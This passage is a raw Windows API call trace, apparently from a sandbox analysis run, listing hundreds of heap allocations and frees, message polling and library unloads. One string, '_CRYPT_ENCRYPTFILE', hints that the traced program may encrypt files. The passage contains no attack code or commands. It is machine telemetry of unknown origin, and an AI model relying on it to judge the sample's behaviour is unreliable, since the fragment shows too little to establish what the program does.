lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.560] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0103.560] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0103.561] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.561] FreeLibrary (hLibModule=0x772d0000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.561] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0103.562] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.563] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eab80 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.563] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.563] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.563] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.564] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0103.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.564] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0103.564] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.565] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0103.566] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0103.566] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.567] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0103.567] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0103.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0103.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0103.568] CloseHandle (hObject=0x258) returned 1 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.568] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0103.569] FreeLibrary (hLibModule=0x772d0000) returned 1 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0103.569] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e00 [0103.569] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2870 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0103.569] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7668 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2790 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca550 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0103.570] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918f8 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0103.571] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0103.571] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0103.572] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 